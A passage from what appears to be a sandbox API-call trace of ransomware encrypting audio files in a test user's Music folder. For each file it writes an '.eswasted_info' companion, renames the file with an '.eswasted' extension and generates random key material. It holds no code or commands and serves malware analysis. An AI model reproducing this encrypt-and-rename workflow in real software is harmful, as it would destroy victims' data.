lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.862] lstrcpyW (in: lpString1=0x71eca4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\iSE8FEYkxF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\ise8feykxf.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\iSE8FEYkxF.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\ise8feykxf.wav.eswasted")) returned 1 [0078.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\iSE8FEYkxF.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\ise8feykxf.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.869] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0078.873] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.874] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.874] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.874] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.875] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.875] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.887] SetEndOfFile (hFile=0x130) returned 1 [0078.889] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.889] CloseHandle (hObject=0x130) returned 1 [0078.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0078.891] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.892] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.892] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\K9vMw6.mp3") returned 66 [0078.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28e) returned 0x1412c98 [0078.892] lstrcpyW (in: lpString1=0x1412d1c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.892] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.894] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.894] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\K9vMw6.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\k9vmw6.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0078.895] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.896] SetEndOfFile (hFile=0x130) returned 1 [0078.896] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.896] lstrcpyW (in: lpString1=0x1412d1c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\K9vMw6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\k9vmw6.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\K9vMw6.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\k9vmw6.mp3.eswasted")) returned 1 [0078.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\K9vMw6.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\k9vmw6.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0078.897] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0078.901] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.902] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.902] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.903] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.904] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.904] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.962] SetEndOfFile (hFile=0x130) returned 1 [0078.964] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0078.964] CloseHandle (hObject=0x130) returned 1 [0078.968] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412c98 | out: hHeap=0x6d0000) returned 1 [0078.968] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.969] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.969] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.969] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\NA3rH-gw7CRw.mp3") returned 72 [0078.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29a) returned 0x71ec18 [0078.969] lstrcpyW (in: lpString1=0x71eca8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.970] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.970] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.970] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\NA3rH-gw7CRw.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\na3rh-gw7crw.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0078.971] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.972] SetEndOfFile (hFile=0x130) returned 1 [0078.973] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.973] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.973] lstrcpyW (in: lpString1=0x71eca8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.973] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\NA3rH-gw7CRw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\na3rh-gw7crw.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\NA3rH-gw7CRw.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\na3rh-gw7crw.mp3.eswasted")) returned 1 [0078.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\NA3rH-gw7CRw.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\na3rh-gw7crw.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.974] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0078.975] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0078.976] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.976] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.976] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0078.977] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0078.977] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.988] SetEndOfFile (hFile=0x130) returned 1 [0078.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.991] CloseHandle (hObject=0x130) returned 1 [0078.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0078.993] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0078.994] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0078.994] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\owOu9G3fvxtWSOaq5GU.m4a") returned 79 [0078.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a8) returned 0x71ec18 [0078.995] lstrcpyW (in: lpString1=0x71ecb6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.996] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0078.996] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.997] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\owOu9G3fvxtWSOaq5GU.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\owou9g3fvxtwsoaq5gu.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0078.997] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.998] SetEndOfFile (hFile=0x130) returned 1 [0078.999] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.999] lstrcpyW (in: lpString1=0x71ecb6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\owOu9G3fvxtWSOaq5GU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\owou9g3fvxtwsoaq5gu.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\owOu9G3fvxtWSOaq5GU.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\owou9g3fvxtwsoaq5gu.m4a.eswasted")) returned 1 [0079.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\owOu9G3fvxtWSOaq5GU.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\owou9g3fvxtwsoaq5gu.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.000] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0079.050] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.051] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.051] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.051] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.052] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.052] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.063] SetEndOfFile (hFile=0x130) returned 1 [0079.066] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.066] CloseHandle (hObject=0x130) returned 1 [0079.068] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.069] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.070] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.070] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.070] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\pd43AJsK_J75-EL r6.wav") returned 78 [0079.070] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x71ec18 [0079.070] lstrcpyW (in: lpString1=0x71ecb4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.070] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.070] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.071] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.071] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\pd43AJsK_J75-EL r6.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\pd43ajsk_j75-el r6.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.072] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.073] SetEndOfFile (hFile=0x130) returned 1 [0079.073] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.073] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.073] lstrcpyW (in: lpString1=0x71ecb4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\pd43AJsK_J75-EL r6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\pd43ajsk_j75-el r6.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\pd43AJsK_J75-EL r6.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\pd43ajsk_j75-el r6.wav.eswasted")) returned 1 [0079.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\pd43AJsK_J75-EL r6.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\pd43ajsk_j75-el r6.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.075] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.077] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.078] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.079] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.079] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.080] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.080] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.091] SetEndOfFile (hFile=0x130) returned 1 [0079.093] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.093] CloseHandle (hObject=0x130) returned 1 [0079.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.174] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.175] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.175] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vDf-RB4rZpp_m.m4a") returned 57 [0079.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x6f5cc0 [0079.175] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x721728 [0079.175] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.176] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x721728 | out: pbBuffer=0x721728) returned 1 [0079.176] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vDf-RB4rZpp_m.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vdf-rb4rzpp_m.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.177] WriteFile (in: hFile=0x108, lpBuffer=0x721728*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x721728*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.178] SetEndOfFile (hFile=0x108) returned 1 [0079.178] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.178] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.178] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.178] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vDf-RB4rZpp_m.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vdf-rb4rzpp_m.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vDf-RB4rZpp_m.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vdf-rb4rzpp_m.m4a.eswasted")) returned 1 [0079.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vDf-RB4rZpp_m.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vdf-rb4rzpp_m.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.179] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.181] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.182] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.182] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.182] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.183] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.183] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.195] SetEndOfFile (hFile=0x108) returned 1 [0079.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.197] CloseHandle (hObject=0x108) returned 1 [0079.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.200] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.201] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.201] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.201] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wf2ac 3kuOVZxS87W_.wav") returned 62 [0079.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x286) returned 0x6f5cc0 [0079.201] lstrcpyW (in: lpString1=0x6f5d3c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x721728 [0079.201] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 